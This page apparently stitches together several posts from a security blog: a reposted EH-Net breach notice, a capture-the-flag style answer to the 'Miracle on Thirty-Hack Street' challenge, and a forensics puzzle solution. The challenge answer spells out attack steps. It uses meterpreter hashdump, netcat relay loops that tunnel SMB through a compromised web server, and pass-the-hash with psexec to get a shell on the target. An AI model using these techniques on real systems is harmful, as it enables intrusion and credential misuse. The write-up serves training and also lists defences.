• Miracle on Thirty-Hack Street from ethicalhacker.net
• the sevenfour challenges (a “keygen-me” type of challenge)

Bonus content:

• t2’09 challenge solutions (via the Reverse Engineering Reddit)
• Hacking Challenges: Have Fun Improving Your Skills! [PDF] – presentation from the RaDaJo guys

Have fun!

Picture taken from ChrisDag’s photostream with permission.

Have fun!

EH-Net Compromise Disclosure

EH-Net was compromised a few months back, and we are asking all members to immediately change their passwords. Although we do not hold any sensitive data such as social security numbers, credit card numbers, date of birth, etc., we still realize that, although it is not recommended, some members may use the same password for social sites such as our as they do for more personally sensitive sites. If this is the case, please immediately change those passwords, too, and make both follow complexity guidelines.

We apologize for the late notification, but while we were in the process of cleaning the mess, we did not want the attackers to be notified. Our intention was to prevent multiple notifications and required actions by our members. Although we feel very comfortable in the status of the site and had planned on notifying all members, someone beat us to the punch. http://www.milw0rm.com/papers/297. We are providing this link, so that our members can see that a select few accounts and their passwords have been released to the public. We do not know how many more they have or will make public. This makes it even more urgent to change your passwords.

We apologize for any inconvenience this has caused. Although many other sites have experienced the same issues, and we are clearly a target based on the content of the site, this in no way excuses us for this incident.

Donald C. Donzal
Editor-in-Chief
The Ethical Hacker Network

Pretty sad. I enjoy their challenges. This goes to show that you have to be always vigilant and assuming that your site is “unhackable” is a very dangerous attitude.

The basic idea came from me seeing tutorials to tunnel SMB over SSH, the difference being that the tunneling had to be done trough two hosts, with netcat and some trickery. I also written about particular steps in detail on the blog previously:

• A few tips for pshtoolkit
• Ranting about Metasploit…
• Short tip

Without further ado, here is my submission:

1) What tool would you have the Winter Warlock download? Why?

The PSH toolkit from: http://oss.coresecurity.com/projects/pshtoolkit.htm to be able to use the password hash for authentication, rather than cracking it (which would take a very looong time, especially because the simpler LANMAN hashes are disabled due to the password length).

2) Devise a step-by-step approach for gaining control of the door1
server so that Kris can execute the dooropen.exe command with the
privileges of the jailmaster account. Describe each tool you would use
and how you would use it at each step of your hack.

The basic plan is the following:

1. dump the password hashes from “jailmasterlaptop”
2. use “web1” to create a tunnel for a SMB connection to “door1”
3. use psexec + pshtoolkit to authenticate and run the executable

Now for the gory details:

– after compromising the “jailmasterlaptop”, hopefully we have access to the meterpreter. There type:

use priv
hashdump

(the first command might not be necessary, but it doesn’t do any harm).
Note the hashes for the Jail Master account.

– get a netcat onto web1, if there isn’t one already (many *NIX systems come with it preinstalled). For example you could do something like this with the command execution vulnerability:

on the laptop:

encode the netcat with base64: base64 -w0 /bin/nc

execute the following commands on “web1”:

echo "The base64 encoded string"|base64 -d > /tmp/fb
chmod +x /tmp/fb

If we use the uploaded netcat, change all references in the following text from nc to /tmp/fb

– now we are ready to create the tunnel. Since we have the restriction of only being able to create outgoing connections from “web1”, we do the following:

on the laptop (as root):

while true; do nc -l -p 80 -c "nc -l -p 139"; done

on “web1” (trough the command execution vulnerability):

while true; do nc door1 139 -c "nc laptop 80"; done

The while loop is there to give use some leeway if we don’t manage to connect in the first try or we get disconnected for some reason.

– being connected, we now need the Pass The hash toolkit download at step 1. There is a slight problem here: on the laptop we might have a version of XP which isn’t supported by iam.exe and iam-alt.exe has a little bug (http://hexale.blogspot.com/2008/10/bug-in-iam-alt-makes-it-fail-completely.html). We have two options: fix the bug in the source as the blog post describes and hope that we have a compiler to recompile the source, or patch the binary, by searching for 00x (inverted because of the little endianess of Intel CPU’s) in it with a hex editor (mcedit will do) and patch it with x00x00x00 (three time the zero byte)

The toolkit executables need to run from the SYSTEM account, so launch a shell with psexec that has SYSTEM account privileges:

psexec \laptop -s c:windowssystem32cmd.exe

Now inject the hash:

iam-alt.exe -h jailmaster:door1:thehashes:recoveredfromjailmasterlaptop

– Finally use psexec to spawn a shell to door1 (proxied trough the laptop and web1):

psexec \laptop -u DOOR1jailmaster c:windowssystem32cmd.exe

Now that we (hopefully) have a shell on door1, search for the executable:

cd 
dir /s|find "dooropen"

3) Briefly finish this tale by describing how the Burgermeisters
could detect the tactics you described in your answer to item 2, as
well as how they could have defended against each step you described.

The week link in the chain was the “web1” machine. They should have:

• make sure that the web application doesn’t have known vulneraibilities
• use something like mod_security to look for suspicious access patterns
• use something like SELinux to disallow stuff like executables being run from /tmp
• disallow all outgoing connections from the server

Patching jailmasterlaptop would also have helped

Finally, a login restriction could have been placed on the jailmaster account on “door1”, such that the account could not be used during non-working hours.

Can you figure out who killed Dr. Wilson, and why? I would say it was Dr. Miller. In the partial disk image there was a e-mail saying:

“I know how you’ve been obtaining our passwords to steal the exams
provide them to the students. You’ll see I have the proof in the
attachment. I expect you to resign your position and leave the
University at the end of the semester or I will be forced to
disclose this information and fire you.
Dr. Wilson”

The attachment contained a photo of Dr. Miller’s office. In the photo one can see a box of – what I assume is – wireless camera. As the answer to question 2 explains, this was used to steal the exams and Dr. Miller feared for his reputation / position.

How were the passwords stolen to steal the exams? My theory is that using a wireless camera they were either read directly from the monitor, or the camera was used to capture the password as they were typed in.

Can you provide a copy of the cryptography final exam? Can you create an answer key? Foremost extract it from the partial drive image (together the Rick Astley video ;-)). On a sidenote, the email was not extracted by foremost (probably because the headers were badly damaged – for example the headers were entirely gone) and had to be extracted manually and the attachment decoded (for example by using the online Base64 decoder at: http://www.motobit.com/util/base64-decoder-encoder.asp).

The answers are:

The first question (a “shift” cypher with 16 places of shift)

a long time ago, in a galaxy far, far away it is a period of civil war. rebel spaceships, striking from a hidden base, have won their first victory against the evil galactic empire. during the battle, rebel spies managed to steal secret plans to the empire’s ultimate weapon, the death star, an armored space station with enough power to destroy an entire planet. pursued by the empire’s sinister agents, princess leia races home aboard her starship, custodian of the stolen plans that can save her people and restore freedom to the galaxy

The second one I didn’t manage to figure out.

The third one was coded using the Enigma algorithm. Given the specified settings one can use the many available simulators (for example the one at http://enigmaco.de/enigma/enigma.html) and get the decoded result: SOMEBODY SETUP US THE BOMB.

Also, provide some analysis of Velma’s incident handling
process. What did she do right? What should she have done differently?The most important problem is that – because of her not using a writeblocker – it will be hard to prove that the contents of the drive were not changed. Also here actions might have eradicated phisical evidence (fingerprints for example). What she did right was the fact that she imaged the drive and worked on the image, rather than working with the drive.